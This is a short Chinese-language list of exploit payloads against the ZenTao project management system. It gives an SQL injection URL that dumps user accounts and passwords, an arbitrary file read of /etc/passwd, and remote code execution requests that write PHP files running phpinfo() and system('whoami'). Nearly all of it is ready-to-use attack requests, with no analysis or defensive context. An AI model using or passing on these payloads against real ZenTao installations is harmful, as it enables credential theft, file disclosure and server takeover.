一.SQL注入漏洞
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
二.任意文件读取漏洞
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd
三.远程代码执行漏洞
1)远程代码执行命令phpnifo();
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111
POST: fileContent=<?php phpinfo(); ?>
Payload2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1
POST: fileContent=<?php phpinfo(); ?>
2)远程代码执行命令system('whoami');
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222
POST: fileContent=<?php system('whoami'); ?>
Payload 2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2
POST: fileContent=<?php system('whoami'); ?>